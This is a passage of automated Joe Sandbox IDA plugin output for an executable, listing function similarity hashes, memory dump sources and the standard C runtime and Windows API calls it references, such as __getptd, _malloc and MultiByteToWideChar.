                    • Opcode ID: 2044051f06bb029c9e823812dcc2e061d3b89e47936c5c72b85e7b0847b4fd87
                    • Instruction ID: 1b69459c467c7fa8006c7adde53d2f8120b600ffac10a9693cc471e97f2dc2fe
                    • Opcode Fuzzy Hash: 2044051f06bb029c9e823812dcc2e061d3b89e47936c5c72b85e7b0847b4fd87
                    • Instruction Fuzzy Hash: 3DD0A7616483B90E57994D3D44604B3FBE8E947212F18549EF5D6E3149E230DC0157AD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbfec440915e90c0d1b823b63d798f982d5df3e420c326224fe04f6fcedd0a9f
                    • Instruction ID: 9500a3a0185f09ac579d42ab2e804b92d0e78f8e9b72581b10f240164f0e9d43
                    • Opcode Fuzzy Hash: fbfec440915e90c0d1b823b63d798f982d5df3e420c326224fe04f6fcedd0a9f
                    • Instruction Fuzzy Hash: CDD01321F740558BC71ECF20DC5057BB3AEA7CE704B15651CC943E7556D710AD154748
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f9a532f81a244a42241e7dcdaad4bdd63221204f0deef8f2c82bfea95ad39f77
                    • Instruction ID: fdf8eebbf36b794ae69b6065a7893941799af6cbe5f29fee32a556930c7dd72e
                    • Opcode Fuzzy Hash: f9a532f81a244a42241e7dcdaad4bdd63221204f0deef8f2c82bfea95ad39f77
                    • Instruction Fuzzy Hash: 22C08C21D400808B8517CF28AC8283273388B07348F102028A953EB291EE40D008C819
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0539b4ff02a10d4f8de8478eea8352a8b2d7107be67f91f23aa197b8eb2023cd
                    • Instruction ID: a80d4aecd6e35a53d3320a59dc3b7a9024c6bf15700c2851e52f9f3551dcdcd3
                    • Opcode Fuzzy Hash: 0539b4ff02a10d4f8de8478eea8352a8b2d7107be67f91f23aa197b8eb2023cd
                    • Instruction Fuzzy Hash: 5EC01234A1828087C34ACB04C880637B6AAAB8A314F106118D9821B3A3C320A8418A08
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a4cb4765e15c0a890cea8c1bfe88a18289266489338ce852b0d1e1870b237cfd
                    • Instruction ID: f2c47e0f106ebd8b3d6e3d8f4710cf72d216f661f095508c21218bf7819fe198
                    • Opcode Fuzzy Hash: a4cb4765e15c0a890cea8c1bfe88a18289266489338ce852b0d1e1870b237cfd
                    • Instruction Fuzzy Hash: B8C04C34E540808BC61ACA10ACD1476E26A5356205B14B5259916D7795C724D4028904
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a101f335b2a79500814998f7d59b66dfcf27f0ee7b06cafbfd64c7bd076275fd
                    • Instruction ID: ab2667ed08f70c2b6469742b74019f399b309b64be025b7bde9ee7d0146252a4
                    • Opcode Fuzzy Hash: a101f335b2a79500814998f7d59b66dfcf27f0ee7b06cafbfd64c7bd076275fd
                    • Instruction Fuzzy Hash: 98B09278E89000CB864ECF04E851432A37CDB17308F05342BA542E3262C624E402C918
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 0040C790
                    • _malloc.LIBCMT ref: 0040C7C9
                      • Part of subcall function 0040B4AF: __FF_MSGBANNER.LIBCMT ref: 0040B4D2
                      • Part of subcall function 0040B4AF: __NMSG_WRITE.LIBCMT ref: 0040B4D9
                      • Part of subcall function 0040B4AF: RtlAllocateHeap.NTDLL(00000000,00408610), ref: 0040B526
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0040C7FC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeap_malloc
                    • String ID:
                    • API String ID: 1306061670-0
                    • Opcode ID: 27be81196fea17ce7323f094cd07afb36f5554c874712604baf33f701ca88864
                    • Instruction ID: e2e458ca7501826cdb0bf92aab3a0e92a11d3c92321269e5647477debd8423b4
                    • Opcode Fuzzy Hash: 27be81196fea17ce7323f094cd07afb36f5554c874712604baf33f701ca88864
                    • Instruction Fuzzy Hash: B9816BB290010AEFCF11AFA4CCC18AE7BA5EB48354B14463BF915F72A1D7388D51DB99
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 0040E74D
                      • Part of subcall function 00409E53: __getptd.LIBCMT ref: 00409E61
                      • Part of subcall function 00409E53: __getptd.LIBCMT ref: 00409E6F
                    • __getptd.LIBCMT ref: 0040E757
                      • Part of subcall function 0040AD41: __amsg_exit.LIBCMT ref: 0040AD51
                    • __getptd.LIBCMT ref: 0040E765
                    • __getptd.LIBCMT ref: 0040E773
                    • __getptd.LIBCMT ref: 0040E77E
                    • _CallCatchBlock2.LIBCMT ref: 0040E7A4
                      • Part of subcall function 00409EF8: __CallSettingFrame@12.LIBCMT ref: 00409F44
                      • Part of subcall function 0040E84B: __getptd.LIBCMT ref: 0040E85A
                      • Part of subcall function 0040E84B: __getptd.LIBCMT ref: 0040E868
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
                    • String ID:
                    • API String ID: 3688206559-0
                    • Opcode ID: 2db1bb391b0cf3e78615b93cc03432e8aee0fde639b6d0981bcd4f4d85589992
                    • Instruction ID: 9e3d9be8aa4d7762f27b392a53c1e3190b5a50d19fa785cf08586503a1bc7035
                    • Opcode Fuzzy Hash: 2db1bb391b0cf3e78615b93cc03432e8aee0fde639b6d0981bcd4f4d85589992
                    • Instruction Fuzzy Hash: 0211C9B1C00309DFDF00EFA5C445B9D7BB1FF04315F10856AF814AB291DB389A519B59
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit
                    • String ID: MOC$csm
                    • API String ID: 1969926928-1389381023
                    • Opcode ID: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                    • Instruction ID: f2957a845660c5c01ee6a7139e6f83219e5b658141119ebe8a50daae15099cb8
                    • Opcode Fuzzy Hash: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                    • Instruction Fuzzy Hash: C8E01A311102048FC710AA66C446B293795EF84319F1909B6E608EB7E2D73CD8A0964B
                    APIs
                    • _ValidateScopeTableHandlers.LIBCMT ref: 004139E1
                    • __FindPESection.LIBCMT ref: 004139FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FindHandlersScopeSectionTableValidate
                    • String ID:
                    • API String ID: 876702719-0
                    • Opcode ID: 40368339a5ee7204651a229e79edce5622c7892ca2a60eb641cd66243f001322
                    • Instruction ID: 17594baa20bd9b84cf1e19b56051b05d292ec9e19e6e681aac94fbae13eee709
                    • Opcode Fuzzy Hash: 40368339a5ee7204651a229e79edce5622c7892ca2a60eb641cd66243f001322
                    • Instruction Fuzzy Hash: FF9105B2E102049BCB10CF59D9807EE77B5EB84311F15812ED806A7391E779EE82CB98
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,0041002F,00000001,00000000,?), ref: 0040FEEB
                    • _malloc.LIBCMT ref: 0040FF20
                      • Part of subcall function 0040B4AF: __FF_MSGBANNER.LIBCMT ref: 0040B4D2
                      • Part of subcall function 0040B4AF: __NMSG_WRITE.LIBCMT ref: 0040B4D9
                      • Part of subcall function 0040B4AF: RtlAllocateHeap.NTDLL(00000000,00408610), ref: 0040B526
                    • _memset.LIBCMT ref: 0040FF40
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,00000000,00000001,?), ref: 0040FF55
                    • __freea.LIBCMT ref: 0040FF6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeap__freea_malloc_memset
                    • String ID:
                    • API String ID: 4236210087-0
                    • Opcode ID: 1cbd2ed6c972f6d600f90a3c4b820154a1b36a87365092507f6548e562b2f8d0
                    • Instruction ID: 720d9b778a85ef635eb90bffddb7b1909058c68a778e08fe7c94cffdb791b02c
                    • Opcode Fuzzy Hash: 1cbd2ed6c972f6d600f90a3c4b820154a1b36a87365092507f6548e562b2f8d0
                    • Instruction Fuzzy Hash: 08519DB150010AAFCF209F65CC81DAF7BA9EF49394B14443BFA04E76A1D638DD658B98
                    APIs
                    • ___initmbctable.LIBCMT ref: 0040DB6E
                      • Part of subcall function 0040A737: __setmbcp.LIBCMT ref: 0040A742
                    • _parse_cmdline.LIBCMT ref: 0040DBB0
                    • _parse_cmdline.LIBCMT ref: 0040DBF1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: _parse_cmdline$___initmbctable__setmbcp
                    • String ID: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                    • API String ID: 1290970244-1005951232
                    • Opcode ID: 57fdd6199c5ed093eabd25ec3d2c718706acc0153773c4a7d1078d9d7d2482e5
                    • Instruction ID: df739acf5495bf8cfba19a6b55449a92c8d52d02650ed707a3356a9168abdd8e
                    • Opcode Fuzzy Hash: 57fdd6199c5ed093eabd25ec3d2c718706acc0153773c4a7d1078d9d7d2482e5
                    • Instruction Fuzzy Hash: 9521E7B1D00118BFCB10EFE89D80CDE7B79EA81324B11467AE514F72C0D274AE49C798
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00411968
                    • __isleadbyte_l.LIBCMT ref: 0041199C
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,?), ref: 004119CD
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00411A3B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 39d259128963b934820a2299397a35abfd35c04fc8e2608e2eead82ca5546b21
                    • Instruction ID: fd92cd10ecd178bec906bab7bbfa3e621a2590a86015116751b641ef2a13aa65
                    • Opcode Fuzzy Hash: 39d259128963b934820a2299397a35abfd35c04fc8e2608e2eead82ca5546b21
                    • Instruction Fuzzy Hash: D931D171610296EFCF20DF64C890AEE7FA5EF00311F1485ABE6A59B2A1D335DD80DB58
                    APIs
                    • TlsGetValue.KERNEL32(0040861F,?,0040B598,?,0040B568,0040861F,?,?,0040861F,?), ref: 0040AB07
                    • TlsGetValue.KERNEL32(00000005,?,0040B598,?,0040B568,0040861F,?,?,0040861F,?), ref: 0040AB1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: Value
                    • String ID: DecodePointer$KERNEL32.DLL
                    • API String ID: 3702945584-629428536
                    • Opcode ID: ebd918356246b68a6b4fce1167d6c157cbc33eb871a14a2f0a63d1a0a9c7e863
                    • Instruction ID: 20c84687a6365f27f61a4355e6884736e347e250e3c39c696c0566f92e00b506
                    • Opcode Fuzzy Hash: ebd918356246b68a6b4fce1167d6c157cbc33eb871a14a2f0a63d1a0a9c7e863
                    • Instruction Fuzzy Hash: D4F0A9345417056ACB105B76DC40DEB3EA9DF403A47184133B918E71E0DB38DC61C69E
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 003CAECE
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 003CAEFD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID: Me+c
                    • API String ID: 237503144-2767035324
                    • Opcode ID: eb193326d453e83d9ebdb244f25b4325be34616b70f772f27f2900c8711ee442
                    • Instruction ID: 6a952149dbdefd7adcfa807e745435323940f2957002527407d1785426e0cb95
                    • Opcode Fuzzy Hash: eb193326d453e83d9ebdb244f25b4325be34616b70f772f27f2900c8711ee442
                    • Instruction Fuzzy Hash: C0513FB0109345AFD315CF14D880B5BBBE6ABC6358F108A2CF8A95B295D770EA44CB92
                    APIs
                      • Part of subcall function 00409EA6: __getptd.LIBCMT ref: 00409EAC
                      • Part of subcall function 00409EA6: __getptd.LIBCMT ref: 00409EBC
                    • __getptd.LIBCMT ref: 0040E85A
                      • Part of subcall function 0040AD41: __amsg_exit.LIBCMT ref: 0040AD51
                    • __getptd.LIBCMT ref: 0040E868
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit
                    • String ID: csm
                    • API String ID: 1969926928-1018135373
                    • Opcode ID: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                    • Instruction ID: 3b303892935f73c44e077245793f5a2bb743f8050405bfdb766377c7a62ed6ea
                    • Opcode Fuzzy Hash: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                    • Instruction Fuzzy Hash: A9011636800204DACF24AE63C440AAEB7B5AF11315F188C3FE4416B7D1CB399AA88A49